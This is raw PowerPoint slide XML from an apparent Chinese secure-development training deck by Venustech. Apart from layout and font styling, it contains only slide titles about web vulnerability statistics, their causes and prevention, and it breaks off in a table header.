            <a:noFill/>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83FC3B9-5032-2D46-B8B0-3AB798DD3FE3}"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AE7A9F2-A302-CB4F-BECB-EA41DBAAA6D7}"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D953247-BBB2-C04B-BB1C-77B855D3A3F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F084494-5B10-F047-B028-F9C5032310CC}"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F99AB26-5EB8-8C45-9371-6D46DE1848F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noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>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38E27148-4611-1E4B-ACF9-75D152ABCA4E}"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4.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6" descr="9.16 PPT内页(18x24cm) 副本2.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6" cstate="email"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1027" name="标题占位符 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1143000" y="274638"/>
            <a:ext cx="6715125" cy="511175"/>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28" name="文本占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="714375" y="1214438"/>
            <a:ext cx="7643813" cy="4714875"/>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charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{AC5210A6-5CB2-9C41-B29D-E9093DCA4D5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eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr kumimoji="1" sz="3800" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
          <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
          <a:cs typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr algn="ctr" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr kumimoji="1" sz="3800">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
          <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
          <a:cs typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr algn="ctr" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr kumimoji="1" sz="3800">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
          <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
          <a:cs typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr algn="ctr" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr kumimoji="1" sz="3800">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
          <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
          <a:cs typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr algn="ctr" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr kumimoji="1" sz="3800">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
          <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
          <a:cs typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
        </a:defRPr>
      </a:lvl5pPr>
      <a:lvl6pPr marL="457200" algn="ctr" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="3800">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
          <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
        </a:defRPr>
      </a:lvl6pPr>
      <a:lvl7pPr marL="914400" algn="ctr" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="3800">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
          <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
        </a:defRPr>
      </a:lvl7pPr>
      <a:lvl8pPr marL="1371600" algn="ctr" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="3800">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
          <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
        </a:defRPr>
      </a:lvl8pPr>
      <a:lvl9pPr marL="1828800" algn="ctr" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="3800">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
          <a:ea typeface="黑体" panose="0201060906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黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
          <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
          <a:cs typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>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黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
          <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
          <a:cs typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>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黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
          <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
          <a:cs typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>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图片 7" descr="PPT内页.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId13" cstate="email"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5123" name="标题占位符 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="928688" y="142875"/>
            <a:ext cx="7215187" cy="642938"/>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5124" name="文本占位符 2"/>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fontAlgn="auto">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:srgbClr val="898989"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>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fontAlgn="auto">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:srgbClr val="898989"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>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latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{40AFB5EC-3CA5-E94F-A2DD-8CB13F5403B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ctr" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr kumimoji="1" sz="4000">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mj-lt"/>
          <a:ea typeface="+mj-ea"/>
          <a:cs typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr algn="ctr" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr kumimoji="1" sz="4000">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
          <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
          <a:cs typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr algn="ctr" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr kumimoji="1" sz="4000">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
          <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
          <a:cs typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr algn="ctr" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr kumimoji="1" sz="4000">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
          <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
          <a:cs typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr algn="ctr" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr kumimoji="1" sz="4000">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
          <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
          <a:cs typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
        </a:defRPr>
      </a:lvl5pPr>
      <a:lvl6pPr marL="457200" algn="ctr" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4000">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
          <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
        </a:defRPr>
      </a:lvl6pPr>
      <a:lvl7pPr marL="914400" algn="ctr" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4000">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
          <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
        </a:defRPr>
      </a:lvl7pPr>
      <a:lvl8pPr marL="1371600" algn="ctr" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4000">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
          <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
        </a:defRPr>
      </a:lvl8pPr>
      <a:lvl9pPr marL="1828800" algn="ctr" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4000">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
          <a:ea typeface="黑体" panose="0201060906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a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr marL="742950" indent="-285750" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
        <a:buChar char="–"/>
        <a:defRPr kumimoji="1" sz="2800">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr marL="1143000" indent="-228600" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
        <a:buChar char="•"/>
        <a:defRPr kumimoji="1" sz="2400">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr marL="16002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mn-ea"/>
          <a:cs typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr marL="2057400" indent="-228600" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
        <a:buChar char="»"/>
        <a:defRPr kumimoji="1" sz="2000">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>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cstate="email"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </a:blipFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32769" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="611560" y="1124744"/>
            <a:ext cx="7772400" cy="1872630"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="4800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:cs typeface="Kaiti SC Regular"/>
              </a:rPr>
              <a:t>中再安全</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="4800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:cs typeface="Kaiti SC Regular"/>
              </a:rPr>
              <a:t>开发培训</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="4800" b="1" dirty="0">
              <a:latin typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              <a:ea typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              <a:cs typeface="Kaiti SC Regular"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="699259" y="5342657"/>
            <a:ext cx="7772400" cy="1182687"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ct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0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:latin typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:cs typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>北京启明星辰信息安全技术有限公司</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" b="1" dirty="0">
              <a:latin typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              <a:ea typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              <a:cs typeface="楷体" panose="02010609060101010101"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505569" y="1628800"/>
            <a:ext cx="8229600" cy="7920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785813" y="1196752"/>
            <a:ext cx="6624637" cy="2277547"/>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安全</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660033"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>开发概述</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="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a:solidFill>
                  <a:srgbClr val="660033"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="660033"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> 中</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660033"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>再</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="660033"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>应用检测项目漏洞统计  </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重要及多发</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="660033"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>WEB</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="660033"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>漏洞成因与防范</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平台</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660033"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>部署与维护具体</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="660033"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>措施</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" b="1"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中再</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>应用检测第一阶段、第二阶段漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714375" y="1214439"/>
            <a:ext cx="7643813" cy="270345"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>XX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>第一阶段</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>WEB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>类 高危漏洞 、多发漏洞</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385033985"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="714375" y="1844824"/>
          <a:ext cx="7776865" cy="1988528"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:tableStyleId>{3C2FFA5D-87B4-456A-9821-1D502468CF0F}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="329233"/>
                <a:gridCol w="2143942"/>
                <a:gridCol w="1366672"/>
                <a:gridCol w="3937018"/>
              </a:tblGrid>
              <a:tr h="299110">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1600" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
